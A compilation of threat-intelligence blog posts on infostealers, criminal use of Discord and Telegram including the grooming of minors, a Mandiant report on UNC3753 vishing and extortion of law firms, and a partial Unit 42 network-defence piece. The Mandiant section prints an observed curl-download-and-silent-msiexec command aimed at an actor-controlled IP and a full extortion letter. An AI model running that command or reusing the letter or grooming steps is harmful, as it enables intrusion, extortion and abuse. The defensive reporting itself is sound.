Infostealers have fundamentally changed the economics of access. Threat actors no longer need to compromise a network directly when billions of credentials, session cookies, and authentication artifacts are already circulating in underground ecosystems. The challenge for defenders has risen from preventing compromise to identifying where access already exists and how quickly it can be weaponized.”

Ian Gray, Vice President of Intelligence at Flashpoint

Identity data is inherently reusable. A stolen credential can be tested across multiple services. A session cookie can potentially allow attackers to hijack authenticated sessions. Browser and host metadata can help threat actors recreate a victim’s environment and bypass security controls designed to detect suspicious logins.

What begins as a single infection can quickly evolve into access across multiple systems, applications, and organizations.

What Is an Identity-Based Attack?

Identity-based attacks occur when threat actors use legitimate credentials, session cookies, authentication tokens, or other identity artifacts to gain access to systems and applications. Rather than exploiting a vulnerability or deploying malware inside a target environment, attackers authenticate as trusted users using stolen identity data.

This shift is one of the primary reasons infostealers have become so valuable. Modern infostealer logs often contain far more than usernames and passwords. They may also include browser cookies, session information, host metadata, application data, and other artifacts that help attackers understand how a user authenticates and what systems they can access. When combined, this information enables account takeover, fraud, lateral movement, and other forms of identity-based abuse.

From Credential Theft to Identity Exploitation

The way threat actors operationalize stolen data is evolving just as rapidly as the data itself.

Historically, attackers often had to manually review stolen credentials and determine which accounts were worth pursuing. Today, that process is increasingly automated.

Infostealer logs can be aggregated, tested, and prioritized at scale, allowing threat actors to rapidly identify valid access across enterprise systems, SaaS platforms, VPNs, and cloud environments.

Flashpoint identifies this as a hybrid threat: the convergence of large-scale identity compromise and automated exploitation.

Once valid access is identified, attackers can move quickly. Credentials may be reused across services. Session data can be leveraged for account takeover. Access can be sold to ransomware operators, fraud actors, or other criminal groups. In many cases, exposure itself becomes part of the attack lifecycle rather than merely a precursor to it.

The result is a threat landscape where stolen identity data is not simply stored and sold. It is continuously tested, validated, reused, and operationalized.

Turning Exposure Into Actionable Intelligence

For defenders, prevention remains important. But prevention alone is no longer enough.

Organizations must also be able to identify when credentials, session cookies, and other identity artifacts have already been exposed and are circulating within underground ecosystems.

The earliest opportunity to intervene is often after data has been exfiltrated but before attackers have successfully operationalized it.

Achieving that visibility requires more than traditional breach feeds or aggregated datasets.

Flashpoint’s Primary Source Collection approach provides direct visibility into the forums, marketplaces, Telegram channels, malware repositories, and illicit communities where infostealer activity originates. Rather than relying solely on recycled breach data, Flashpoint continuously collects from the environments where stolen identity data is first shared, sold, and operationalized.

However, collection alone is not enough.

Raw infostealer logs are noisy, fragmented, and difficult to operationalize at scale. Flashpoint transforms these logs into structured intelligence through a multi-stage workflow that includes:

  • Source ingestion from underground ecosystems
  • Normalization and de-duplication of collected data
  • Automated parsing and enrichment of credentials, cookies, host metadata, and malware attribution
  • Structured output that supports alerts, investigations, and integrations across existing security workflows

This process helps defenders understand not only what was exposed, but who may be affected, how exposure occurred, what systems may be at risk, and how quickly action is required.

Building a Proactive Defense Across the Identity Layer

The rise of infostealers has fundamentally changed how organizations should think about attack surface management.

The attack surface is no longer limited to infrastructure, endpoints, or internet-facing applications. It now includes the digital identities of employees, partners, vendors, and customers.

Security teams need visibility into the identity layer itself β€” understanding where exposure exists, how attackers are leveraging stolen data, and what actions should be taken before access is exploited.

By combining direct visibility into underground ecosystems with structured, actionable intelligence, organizations can identify compromised accounts earlier, uncover infection trends, prioritize response efforts, and reduce the likelihood of downstream compromise.

Download Identity Is the New Attack Surface: A Guide to Infostealers and Proactive Defense to learn how your organization can build a proactive defense program across the identity layer.

Key Infostealer Statistics

According to Flashpoint research:

  • More than 11.1 million devices were infected with infostealers in the last year.
  • Over 3.3 billion credentials, session cookies, cloud tokens, and identity artifacts are circulating across illicit markets.
  • Flashpoint analysts identified 30+ active infostealer strains being sold across underground ecosystems.
  • Flashpoint’s credential database contains 48+ billion credentials, including more than 1 billion tied to infostealer activity.
  • More than 4.2% of infostealer-exposed credentials include browser cookies that may support session hijacking.
  • Flashpoint can collect and parse some infostealer logs within one to two days of infection.

Frequently Asked Questions (FAQ)

FAQ: Infostealers and Identity-Based Threats

What is an infostealer?

An infostealer is a type of malware designed to collect sensitive information from an infected device. Depending on the strain, this can include usernames and passwords, browser cookies, session tokens, saved payment information, cryptocurrency wallets, system metadata, and other identity-related artifacts.

How do infostealers work?

Infostealers infect a victim’s device and collect information such as credentials, browser data, session cookies, autofill information, cryptocurrency wallet data, and system metadata. The stolen information is packaged into files known as infostealer logs, which can then be sold, shared, or operationalized by threat actors.

What information can infostealers steal?

Depending on the malware family, infostealers can collect usernames and passwords, session cookies, authentication tokens, browser history, saved payment information, cryptocurrency wallet data, system information, installed applications, and other identity-related artifacts. The goal is to provide attackers with enough information to access accounts and impersonate legitimate users.

What are the most common infostealers?

The infostealer ecosystem changes rapidly, but Flashpoint analysts currently track strains such as Lumma (also known as LummaC2/Remus), StealC, Vidar, Acreed, and Rhadamanthys among the most prominent malware families driving credential theft and identity-based attacks.

Why are infostealers so dangerous?

Infostealers provide attackers with more than credentials. Modern infostealer logs often contain the context needed to use stolen data, including session information, browser artifacts, and device metadata. This allows threat actors to perform account takeovers, move laterally within environments, and gain access to business-critical systems. According to Flashpoint’s 2026 Global Threat Intelligence Report, more than 11.1 million devices were infected with infostealers last year, contributing to a pool of over 3.3 billion stolen credentials, session cookies, cloud tokens, and other identity artifacts.

What is an infostealer log?

An infostealer log is a package of data collected from an infected device. Logs may contain credentials, cookies, browser data, application information, host metadata, and other artifacts that help attackers understand how a victim authenticates and what systems they can access.

Can infostealers bypass multi-factor authentication (MFA)?

In some cases, yes. While multifactor authentication remains a critical security control, stolen session cookies and authenticated session data can sometimes allow threat actors to hijack existing sessions without needing to complete the MFA process themselves. Flashpoint found that more than 4.2% of infostealer-exposed credentials in its dataset were associated with browser cookies, highlighting the growing importance of session-based risk.

How do threat actors obtain infostealer logs?

Infostealer logs are frequently bought and sold across illicit marketplaces, forums, Telegram channels, and other underground communities. Many are distributed through Malware-as-a-Service (MaaS) offerings that make infostealer capabilities accessible to a wide range of threat actors. Flashpoint analysts identified more than 30 unique infostealer strains actively offered for sale across underground ecosystems.

How can organizations detect credential exposure from infostealers?

Organizations can monitor underground sources where stolen data is shared and sold, identify exposed credentials associated with their domains, and investigate related artifacts such as cookies, host metadata, and malware attribution. The earlier exposure is identified, the greater the opportunity to remediate before attackers operationalize access. Flashpoint collects and parses some infostealer logs within one to two days of infection, helping organizations detect exposure closer to the point of compromise.

What should organizations do if employee credentials appear in an infostealer log?

Organizations should immediately assess the scope of exposure, reset affected credentials, invalidate active sessions, review authentication activity, investigate the infected device, and determine whether additional accounts or systems may have been impacted.

How is Flashpoint’s approach to infostealer intelligence different from traditional breach monitoring?

Many organizations rely on aggregated breach feeds or credential dumps that may be weeks or months old by the time they are discovered. Flashpoint’s Primary Source Collection (PSC) approach provides direct visibility into the forums, marketplaces, Telegram channels, and underground communities where stolen identity data is first shared, sold, and operationalized.

In addition to collecting raw infostealer logs, Flashpoint parses and enriches the data with context such as malware attribution, session cookies, host metadata, browser artifacts, and affected identities. Today, Flashpoint’s credential database contains more than 48 billion credentials, including over 1 billion tied to infostealer activity, providing organizations with actionable intelligence rather than raw exposure data.

Request a demo today.

The post Identity Is the New Attack Surface: How Infostealers Are Reshaping Enterprise Risk appeared first on Flashpoint.

Understanding Illicit Ecosystems: Weaponizing Mainstream Apps and Social Infrastructure

Blogs

Blog

Understanding Illicit Ecosystems: Weaponizing Mainstream Apps and Social Infrastructure

As part of our ongoing series, we focus on the shared infrastructure that fuels threat actors; the intersection of mainstream social media, open-source messaging platforms, and gaming communities.

SHARE THIS:

Threat actors and their illicit communities do not exist in a vacuum. To scale their operations, coordinate financial fraud, deploy malware, and recruit new talent, threat actors must interface with the broader digital world. This means leveraging everyday, public digital spaces to facilitate illicit activity, effectively hiding in plain sight.

The Clearnet Threat Landscape: Hiding in Plain Sight

When conceptualizing the cybercriminal underground, it is easy to focus exclusively on Tor-based onion sites or restricted-access dark web forums and marketplaces. However, a massive portion of modern illicit activity thrives on the clearnet. Threat actors heavily utilize commercial social media and public messaging networks to coordinate fraud, deploy malware, and run public relations campaigns for their operations.

At first glance, conducting illicit operations on highly monitored, mainstream platforms seems counterintuitive. However, the massive, continuous volume of legitimate traffic on the clearnet provides a form of operational security. By blending into the noise, threat actors can maintain a highly accessible digital presence. This visibility is crucial for their business models: it allows them to maintain a low barrier to entry for potential recruits and targets who know exactly what markers to look for, or who are systematically funneled into these spaces.

How Threat Actors Weaponize Consumer Platforms

The misuse of mainstream communication tools has changed how threat actors interact. Rather than waiting for users to seek out the dark web, cybercriminals are actively meeting their targets or co-conspirators on platforms designed for daily socialization.

Discord

Originally built to connect gaming communities, Discord’s rapid growth and robust infrastructure have inadvertently made it a target for malicious activity. Cybercriminals treat the platform as a multi-functional tool for both technical infrastructure, social engineering, and radicalization.

On a technical level, advanced persistent threats (APTs) and other threat actors exploit Discord’s content delivery network (CDN) to host and distribute malware. Because traffic to Discord domains is generally trusted by corporate networks, threat actors can potentially use it to deliver payloadsβ€”such as infostealers and remote access trojans (RATs)β€”bypassing standard security perimeters.

Beyond hosting malware, extremist groups across various ideological spectrums often target the platform’s demographic, which skews heavily towards younger tech-savvy users. This group provides an impressionable pool of adolescents who may be susceptible to grooming, indoctrination, and recruitment into illicit operations.

Case Study: The Targeting and Recruitment Mechanics of β€œThe Com”

While monitoring The Com, Flashpoint analysts have observed the systematic use of platforms like Discord, Roblox, and Minecraft to run predatory extortion pipelines. The mechanics of this ecosystem takes place through a multi-phase methodology:

  1. Platform Scouting: Recruiters patrol servers on popular youth-centric gaming platforms, such as Discord, Roblox, and Minecraft. They look for minors showing signs of social isolation, depression, disordered eating, or a desire to belong.
  2. Building Trust and β€œLove Bombing”: Initial engagements are seemingly harmless. However, trust is built quickly to establish a sense of indebtedness. Recruiters offer gifts such as in-game perks/currency, premium subscriptions, or other digital items. In some cases, a romantic facade is used to establish a connection. In either scenario, β€œlove bombing” creates an immediate feeling of psychological obligation in the target.
  3. Platform Migration: Once rapport is established, the recruiter moves the target away from the game and into an encrypted app or private Discord server, following a public-to-private strategy. By moving the interaction away from the original platform’s safety controls, the recruiter can isolate the target in a more controlled environment.

Once isolated, perpetrators coerce victims into sending sensitive imagery or CSAM. This material is immediately compiled and weaponized as leverage for blackmail via doxxing. This creates a severe psychological trap in which the victim feels compelled to partake in escalating illegal activity to keep their previous actions hidden. This drives the victim to transition from a victim into an aggressor to escape their own abuse.

Telegram

While many social media and messaging platforms can serve as an initial funnel for engagement, Telegram has been known to be used from time to time as an operational hub for the broader illicit ecosystem. Since the arrest of Pavel Durov, Telegram has begun working more closely with law enforcement, leading to several key arrests and major disruptions due to their cooperation.Β 

The platform occupies a unique space in threat intelligence and open source intelligence (OSINT). While the vast majority of its user base is entirely benign, its minimal moderation policy and robust channel architecture have made it vital to public and private intelligence gathering.

Telegram functions as an open marketplace and real-time coordination center for a vast spectrum of threat actors. Flashpoint has observed it being used by:

  1. State-sponsored APT groups and hacktivists
  2. Geopolitical actors and mercenary groups distributing battlefield intelligence and propaganda
  3. Cybercriminal syndicates coordinating financial fraud schemes, check fraud, and the sale of compromised data.

Furthermore, threat actors routinely use other public-facing platforms like X (formerly Twitter) alongside Telegram to amplify their impact. They leverage the broad reach of social media to broadcast proof of their compromises, hype up ransomware leaks, and exert public pressure on corporate victims during extortion cycles. Concurrently, Telegram often acts as the backend repository where the stolen data is hosted, discussed, and monetized.

Monitor the Clearnet Using Flashpoint

The evolution of illicit ecosystems demonstrates that the lines between the dark web and the clearnet have intersected. Whether analyzing the activities of extremist and threat actor groups or tracking the predatory pipelines of The Com, defenders must look beyond traditional intelligence sources.

Because malicious actors rely heavily on consumer messaging apps and social platforms to coordinate attacks, leak data, and target people, monitoring these public-to-private pipelines is an essential component of threat intelligence. Uncovering these physical and cyber threats requires best-in-class threat intelligence and OSINT investigations capable of parsing the massive noise of the clearnet to find the signals of illicit coordination.

Request a demo to see how Flashpoint empowers security teams to monitor these decentralized threat landscapes to proactively protect their critical assets.

Check out the rest of our β€œUnderstanding Illicit Ecosystems” series:
Understanding Illicit Ecosystems: The Hybrid Threat of β€œThe Com”
Understanding Illicit Ecosystems: XSS and the Current State of the Russian-Speaking Underground

See Flashpoint in Action

The post Understanding Illicit Ecosystems: Weaponizing Mainstream Apps and Social Infrastructure appeared first on Flashpoint.

Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms

5 June 2026 at 16:00

Written by: Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer, Tyler McLellan


IntroductionΒ 

From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign executed by the threat cluster UNC3753 (also tracked as "Luna Moth," β€œChatty Spider,” and "Silent Ransom Group") targeting dozens of organizations across professional, legal, and financial services in the United States.

UNC3753 leverages voice phishing (vishing) and social engineering deception techniques to achieve remote access into corporate environments. Using pretexts such as data migration or invoice related emails, the threat actors initiate phone conversations posing as IT support and convince targets to host screen-sharing sessions and download remote monitoring and management (RMM) utilities. Once inside the environment, the threat actors either directly conduct searches to locate and exfiltrate highly sensitive data, or manipulate the victim into executing these actions on their behalf. This data typically includes proprietary legal agreements, personally identifiable information (PII), and financial records for subsequent extortion demands.

Notably, in instances possibly linked to UNC3753, threat actors have accessed victims' systems in person. In these physical incidents, individuals posing as IT technicians entered corporate offices to attempt direct exfiltration of data from an endpoint using USB storage media.Β 

This blog post details the threat group's technical lifecycle across recent Mandiant Consulting incident response engagements, highlights tactics like physical office targeting, and provides actionable recommendations to safeguard endpoints and infrastructure.

Threat Detail

The UNC3753 campaign lifecycle reflects an optimized, fast-tempo operational model. In many Mandiant investigated incidents, the entire attack sequenceβ€”from initial target contact to data theft and extortionβ€”occurred within a single business day. Recently, Mandiant observed data searches, staging, and theft initiated in under an hour.Β 

The threat group frequently initializes campaigns using benign, invoice-themed email lures sent from actor-controlled consumer email accounts. These messages contain no active links or malicious attachments. Instead, they typically contain a brief, generic message for example: β€œhello, here is the invcoie we talked about yesterday”. Google Threat Intelligence Group (GTIG) assesses that the primary purpose of these emails is to establish a pretext, raising the target's internal security concerns so they are more susceptible to follow-up voice calls.

UNC3753 Attack Lifecycle

Figure 1: UNC3753 attack lifecycle

Initial Access via IT Helpdesk Impersonation

The core of UNC3753's entry mechanism relies on targeted vishing. Mandiant has observed the group targeting personnel across all seniority levels, who are often publicly listed on the organization’s websites, to harvest phone numbers and email addresses. Acting as members of the organization's internal IT helpdesk or security team, threat actors place direct calls to these employees.Β 

The callers use a variety of verbal instructions to guide target behavior. Under the guise of addressing a security issue or aiding with a corporate data migration project, they build trust and direct the target to join a screen-sharing session.

Remote Screen Control and Legitimate Tool Abuse

Once the target is engaged, the threat actors bypass conventional automated boundary security and email filtering controls by instructing the user to download and execute screen-sharing applications.Β 

Screen-Sharing Utilities

UNC3753 instructs targets to initiate remote desktop and support sessions using built-in or commercial services, including Zoom, Microsoft Terminal Services, Microsoft Teams, and Quick Assist. During a Teams-facilitated intrusion, the threat actor held five distinct calls with the same target over a three-day period.

Commercial RMM Agents

UNC3753 frequently attempts to establish more persistent access by social engineering targets into downloading AnyDesk, Bomgar, or Zoho Assist installers. In one engagement, the threat actor attempted to install a "SuperOps RMM agent" by convincing the target to download and execute a payload via a cURL command.

Message Delivery via Privnote

Threat actors consistently utilize privnote[.]com, a web-based, self-destructing text utility, to transmit installation links and commands to targets. This evasion technique ensures that copy-paste vectors leave no permanent footprint on endpoint browsers or chat logs.

Example cURL command staging string observed in UNC3753 remote sessions:

curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet

Infrastructure Pivoting and Local Staging

Intrusions have abused Bring Your Own Device (BYOD) remote environments to access internal enterprise assets. In separate Mandiant Consulting cases, UNC3753 established Zoom sessions directly on targets' personal BYOD endpoints. Using these compromised personal laptops, they accessed corporate virtual desktop infrastructure (VDI) using native client platforms, such as Windows 365 (Windows365.exe) or Citrix clients.Β 

Once VDI environment access is secured, the threat actors pivot to corporate file systems:

  1. System Enumeration: The threat actors map local directories, enumerate active OneDrive folders, and crawl mapped network drives.

  2. Document Management Targeted Harvesting: Threat actors target specific legal and document storage repositories.

  3. Keyword Search and File Staging: Threat actors use specific keyword search functions within iManage to locate highly sensitive folders containing tax logs (Forms W-2, W-9, and 1099), audit files, corporate client agreements, and Social Security numbers (SSNs). Staged results are compiled and sorted within target-accessible subdirectories, primarily inside the user's Downloads folder or native Roaming profile path.

Data Theft

UNC3753 exfiltrates the staged data using a variety of methods to bypass security controls. They frequently use portable versions of WinSCP or Rclone. In other instances, they simply log into a threat actor-controlled consumer file sharing account directly within the victim's web browser and batch upload the stolen files.

  • Cloud Storage Staging: Threat actors instruct targetsβ€”or directly control their screensβ€”to drag and drop staged folders into threat actor-controlled consumer file sharing accounts. In several intrusions, the exfiltration destination included folders explicitly renamed to mimic the victim organization's branding.

  • FTP Utilities: When browser-based uploads are restricted by endpoint controls, threat actors download FTP and SFTP client binaries, primarily WinSCP, to exfiltrate bulk packages. In one incident, the threat group exfiltrated 1.7 gigabytes of data from a target's local OneDrive folder to a Google Drive account before pivoting to a VDI session and exfiltrating an additional 14.4 gigabytes using WinSCP. Google has taken action against this actor by disabling the Drive accounts and assets associated with this activity.

  • Email Forwarding: The threat actors have also had victims stage files from internal iManage repositories and instructed them to send the files to threat actor-controlled consumer email addresses from the target's mailbox.

Threat Actor Extortion Tactics

The threat cluster delivers unbranded extortion communications via email shortly after successfully stealing data, often within 30 minutes of exiting the target environment.Β 

These highly aggressive extortion letters give organizations a three-day deadline to respond and initiate ransom negotiations. If the victim organization is unresponsive, the threat actors declare they will call and email target employees and external clients directly to alert them of the data breach. The extortion letters explicitly emphasize that the leak will compromise client trust, invite substantial regulatory fines, and suggest that external clients sue the victim organization for data mishandling. Additionally, as part of a follow-on message the group has threatened to publish all exfiltrated archives on the LEAKEDDATA data leak site (DLS).

Sample Extortion Email

Subject: [Victim Name] has lost confidential data of their clients. Very Important!

Hello,

We have to inform you that we got access to the [Victim Name] corporation's database and took a very large dataset. We have been in your network for weeks in multiple systems , aiming for proprietary and confidential files, and were able to obtain what We were looking for as well as the data of many clients. <mentions the general nature of the stolen documents>. This is not a joke or a scam.

This is a real problem that puts the existence of your firm in danger and to prove it We have attached screenshots that are confirming the possession of the files.

Reply to Our email and We will show you the complete file tree and actual files.

We are an elite group who's been in this business for a very long time, We have Our own website where We post the data and thousands of individuals follow Our work , and connections in different business social media. But, what's more important, is that We want to return your data peacefully and as soon as possible.

We will guarantee you the complete database deletion from Our servers, video evidence of us deleting the files, privacy of our communication and Our security advice with an explanation of how We got into your network and how to fix the vulnerability that We found.

In order for us to solve this problem you need to send us an email and start communicating with us. We hope to find a financial solution that will be acceptable for both parties.

In case of ignorance or no agreement, We will notify your employees, partners and customers, after which We will publish your data. You will receive claims from individuals, and legal entities for information leakage and breach of contracts, your current deals will be terminated. Journalists and others will dig into your documents, finding inconsistencies or violations in them. Your organization will lose its reputation, shares will fall in price, and your organization will be forced to close.

Let us remind you that your data can be used by many other hackers and criminals on the dark web as well as your competitors and enemies in case We leak the data.

Law enforcement will not help you, We are out of their jurisdiction, and We already took all the critical data. They will only tell you not to communicate with us and be the first ones to fine you.

As soon as you reach out, We will show you all the files that We obtained, so you can understand the seriousness of this problem and the necessity to proceed to the negotiations.

Our communication will stay 100% private before and after the agreement. We can show the proof of it as well.

All further communication can be done through this email address.

Do not waste any time as it is ticking . Text us today, so We don't have to start calling your employees tomorrow. You will have 3 days to start communicating.

Here We attached some screenshots confirming all the above. Respond to this email and We will send you the file tree.

Figure 2: UNC3753 extortion note example

Data Leak Site

LEAKEDDATA DLS (partially redacted; cropped)

Figure 3: LEAKEDDATA DLS (partially redacted; cropped)

Suspected UNC3753 Activity Involving Physical Access

While UNC3753 primarily relies on digital vectors, GTIG assesses that associated threat actors have also attempted direct data theft using physical, in person access. This escalating tactic is corroborated by a recent FBI Cyber FLASH Alert highlighting instances where Silent Ransom Group threat actors leveraged physical office access to exfiltrate corporate data via removable USB media.

According to the FBI advisory, if remote social engineering attempts fail, actors will send an individual to a victim's physical location. The onsite threat actor will claim they need to image the device or create local backups to address a security issue. Once they gain access to the endpoint, they attempt to exfiltrate corporate data directly to an external drive.

Although limited forensic evidence and the absence of a subsequent extortion attempt prevent formal attribution, GTIG assesses that these physical intrusions are likely associated with UNC3753 based on structural, timeline, and targeting overlaps.

Attribution

GTIG attributes this campaign and related social engineering operations to UNC3753 based on infrastructure overlaps, domain registrar tracking, victimology, and target staging directories. UNC3753 (aliases: "Luna Moth," β€œChatty Spider,” and "Silent Ransom Group (SRG)") is a financially motivated threat cluster active since at least March 2022. UNC3753 has TTP overlaps with UNC2686, a threat cluster that conducted "Bazarcall" style campaigns dating to early 2021. UNC3753 deployed LOCKBIT.BLACK in 2022, but has since prioritized data theft extortion-only operations typically involving threats to post stolen files to the LEAKEDDATA DLS. The threat cluster relies heavily on Remote Monitoring and Management (RMM) tools, unlike UNC2686 which deployed BAZARLOADER variants as well as TRICKBOT, URSNIF, and SILENTNIGHT. Initially, UNC3753 used subscription-themed billing email lures (such as fake software renewal alerts), typically with PDF attachments containing phone numbers for actor-controlled call centers. Beginning around March 2025, the cluster shifted tactics to pose as internal corporate IT helpdesk staff.

Remediation and Hardening

To mitigate the risk of voice phishing, physical office intrusions, and unauthorized endpoint control, GTIG recommends that organizations implement the following mitigation controls:

User Education

Conduct user awareness training specifically tailored to UNC3753 tactics, techniques, and procedures.

Physical Access and Verification Policies

Implement rigid out-of-band identity verification controls for all external contractors, technical staff, and facilities visitors. Mandate the following physical controls:

  • Require visitors to display official credentials and photo identification.

  • Require front-desk staff to copy and log all physical visitor IDs before granting access.

  • Verify the arrival of all technicians against pre-scheduled work orders directly with the verified parent organization or helpdesk dispatcher.

  • Enforce a policy requiring physical technical service personnel to be escorted by a corporate supervisor at all times.

Remote Access Conditional Access Controls

Implement remote access conditional access policies to ensure only corporate owned devices can authenticate to Virtual Desktop Instance (VDI) or Virtual Private Network (VPN) devices. This facilitates increased organizational control and visibility for potential Remote Monitoring and Management usage.Β 

Enforce Strict RMM and Screen-Sharing Software Controls

Audit corporate environments to block the installation and execution of unauthorized remote monitoring, management, and support utilities. Enforce application control policies (e.g. Windows Defender Application Control or third-party endpoint protection tools) to restrict execution of non-approved binaries. Organizations may also consider restricting interactive screen-control features within authorized virtual meeting platforms like Zoom and Teams.Β 

Endpoint Removable Media Hardening

To neutralize physical exfiltration vectors, disable read/write capabilities for all external USB mass storage devices. Enforce Group Policy Objects (GPOs) or MDM configurations to restrict:

  • USB storage device installation.

  • Removable media access.

  • Optical media writes on all corporate endpoints and BYOD systems utilizing VDI entry.

Network Monitoring and Egress Control

Monitor firewall logs, network flows, and endpoint execution logs for indicative exfiltration and staging actions. Specifically:

  • Block or alert on outbound connections to unauthorized file-sharing APIs and emails.

  • Ensure full session logging with bytes transferred is enabled within Firewall log configurations.

  • Monitor SSH traffic (Port 22) from internal VDIs and endpoints for high-volume WinSCP and Rclone transfers.

Application Log and Access Auditing

Review authentication and access metrics for critical document stores to identify bulk harvesting profiles.

  • Configure real-time alerts in iManage, SharePoint, and corporate email directories for rapid file searches, search-term spikes, and mass file downloads.

  • Implement multi-factor authentication (MFA) on business critical data repository applications, such as iManage.Β 

  • Implement strict BYOD authentication controls, requiring MFA step-up queries when accessing VDI nodes.

Outlook and Implications

The targeting of US legal and professional services organizations by financially motivated actors is a persistent industry risk. Legal services firms represent high-value targets for extortion actors. They maintain concentrated repositories of extremely sensitive client transaction files, merger and acquisition plans, client trade secrets, and corporate regulatory reports. Threat groups recognize that legal entities are subject to heavy reputational and regulatory exposure and may be highly motivated to resolve extortion situations quietly to protect their professional standing.

Threat actors recognize that targeting the human elementβ€”specifically using voice-guided social engineeringβ€”enables them to easily bypass robust technical perimeters, web security gateways, and MFA configurations.Β 

Finally, the integration of in-person, physical intrusions represents an escalation in threat capability. While log-based defenses and endpoint telemetry have matured, physical corporate boundaries are frequently protected only by administrative procedures. Organizations must transition to a unified security posture that treats physical facility access control and endpoint-based hardware policies as equal components of their defensive perimeter.

Data Leak Site (DLS)

UNC3753 utilizes the following web platform to disclose the identities of victims and their compromised data.

  • hxxps[:]//business-data-leaks[.]com

Phishing Domains

GTIG identified infrastructure registrations by suspected UNC3753 actors utilizing specific naming conventions, assessed as supporting their ongoing social engineering and vishing activities.

  • <organization>-itdesk[.]com

  • <organization>-it[.]com

  • <organization>-helpdesk[.]com

Indicators of Compromise (IOCs)Β 

To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users.

IOC Type

Indicator

IPv4 Address

192.236.147.131

IPv4 Address

192.236.147.138

IPv4 Address

193.141.60.212

IPv4 Address

192.236.154.158

IPv4 Address

192.236.146.173

IPv4 Address

174.169.162.62

IPv4 Address

64.94.84.97

Google Security Operations (SecOps)

Google SecOps customers have access to these broad category rules and more under the Mandiant Intel Emerging Threats rule pack. The activity discussed in the blog post is detected in Google SecOps under the rule names:

  • Execute MSI Files Downloaded via Curl

  • Suspected Rclone Exfiltration

MITRE ATT&CK

Tactic

Technique ID

Technique Name

Initial Access

T1566.004

Phishing: Spearphishing Voice

T1133

External Remote Services

Execution

T1204.002

User Execution: Malicious File

T1059.001

Command and Scripting Interpreter: PowerShell

T1059.003

Command and Scripting Interpreter: Windows Command Shell

T1569.002

System Services: Service Execution

Persistence

T1053.005

Scheduled Task/Job: Scheduled Task

T1547.001

Boot or Logon Autostart Execution: Registry Run Keys

Defense Evasion

T1036.005

Masquerading: Match Legitimate Name or Location

T1553.002

Subvert Trust Controls: Code Signing

T1562.001

Impair Defenses: Disable or Modify Tools

T1070.001

Indicator Removal: Clear Windows Event Logs

Credential Access

T1003.001

OS Credential Dumping: LSASS Memory

T1003.002

OS Credential Dumping: Security Account Manager

Discovery

T1083

File and Directory Discovery

T1135

Network Share Discovery

T1046

Network Service Discovery

Lateral Movement

T1219

Remote Access Software

T1021.001

Remote Services: Remote Desktop Protocol

T1021.004

Remote Services: SSH

Collection

T1005

Data from Local System

Command & Control

T1572

Protocol Tunneling

Exfiltration

T1020

Automated Exfiltration

T1567.002

Exfiltration Over Web Service: Exfiltration to Cloud Storage

T1052.001

Exfiltration Over Physical Medium

Impact

T1486

Data Encrypted for Impact

How AI and Evasion Demand a Radical Shift in Network Threat Prevention

The Future of Threat Defense Resides at the IP Layer

For years, network security operated on a relatively predictable premise: inspect traffic, identify malicious content, and block it. Because deep content inspection created a seemingly robust defense in depth, relatively static legacy approachesβ€”like reliance on threat intelligence feedsβ€”were allowed to simply persist in the background.

The weaponization of agentic AI and highly evasive techniques has fundamentally shattered that model. Attackers are no longer just iterating on old threats. They are launching attacks at staggering velocity, completely outpacing threat feeds, and employing evasion tactics that actively starve legacy prevention solutions of the content they rely on to inspect.

Our new research report from Unit 42, Attackers Are Evading Threat Prevention at the Internet Edge, reveals how adversaries are actively exploiting the contextual vacuum at the IP layer to bypass standard security controls. For security leaders, understanding this shift is no longer optional. As the nature of the threat fundamentally changes, our strategic approach to network security must definitively change with it.

The AI-Accelerated, Evasive Attack Lifecycle

To understand why legacy defenses are failing, we must look at how adversaries are accelerating and obfuscating every stage of the attack lifecycle. As these threats progress, the commonly used network indicators we have long relied upon are vanishing, collapsing traditional defenses and leaving defenders with little to act on.

Powered by frontier AI, adversaries now automate reconnaissance and exploitation at huge scale and speed, while using anonymizers to mask their intent. Once an intrusion is launched, orchestration shifts to highly evasive command and control (C2). Attackers hide communications using advanced encryption and AI-built malware-less techniques. They’re also bypassing traditional web and DNS inspection entirely by routing traffic directly to IP addressesβ€”a tactic Unit 42 found in 23% of modern malware

Ultimately, the takeaway is clear: network threat prevention can no longer rely solely on detecting malicious payloads. As AI-driven attacks continue to minimize their footprint, security strategies must augment content inspection with real-time IP layer monitoring to left-shift threat detection and counter these rapid, machine-speed threats at the network foundation.

Existing Approaches Aren’t Working

Where content-based detection falls short, many security vendors and organizations still rely on IP threat intelligence feeds to pick up the slack in an attempt to filter out malicious connections on the network layer. However, after years of operating under this model, the results are inβ€”the traditional feed is showing its age.

Attackers have long relied on proxies, anonymizers, residential routers and public cloud providers as a tactic to evade detection. However, agentic AI morphs this process, enabling rapid infrastructure rotation and stealth at an unprecedented scale. As this autonomous evasion accelerates, experienced network defenders continue to run into the well-known limitations of classic IP blocklists:

  • Too slow to keep pace: Unit 42 found an average 20-day lag time before new threats hit popular feeds. Because agentic AI enables adversaries to autonomously rotate proxy IPs in hours, these lists are obsolete at the moment of delivery.
  • Fundamentally incomplete: IP feeds are unable to see a massive portion of the modern attack surface. Unit 42 research indicates that 52% of malicious IPs used for direct-to-IP connections are completely absent from these lists.
  • Unactionable on shared infrastructure: Even known threats are often impossible to block. The Unit 42 team reports that 37% of direct-to-IP traffic uses reputable CDNs and cloud providers. IP feeds cannot distinguish malicious connections from legitimate ones, making blocking too risky for business continuity.
  • A management nightmare: Among the security teams that Unit 42 polled, 30% indicate resource-intensive vetting and false-positive triage as their top pain point. To avoid breaking legitimate traffic, feeds are frequently relegated to an alert-only mode, defeating the entire purpose of prevention.

If modern and agentic AI-enabled attacks can outrun traditional network payload-based detections, we need a new weapon in the network defender’s arsenal. We can no longer depend on yesterday’s IP feeds to secure such an extremely agile threat environment.

The Blueprint for Modernizing the Internet Edge

To outpace the impact of agentic AI and advanced evasion on network threat prevention, security leaders must redefine their defense strategy and shift-left to track the attacker infrastructure itselfβ€”monitoring the exact IP layer locations where adversaries build and control their campaigns. Deep content inspection remains essential, but securing the modern edge requires establishing the context and intent of a connection before a session is established.

To achieve this goal, organizations must move beyond the limitations of static defense and adopt a modern security blueprint:

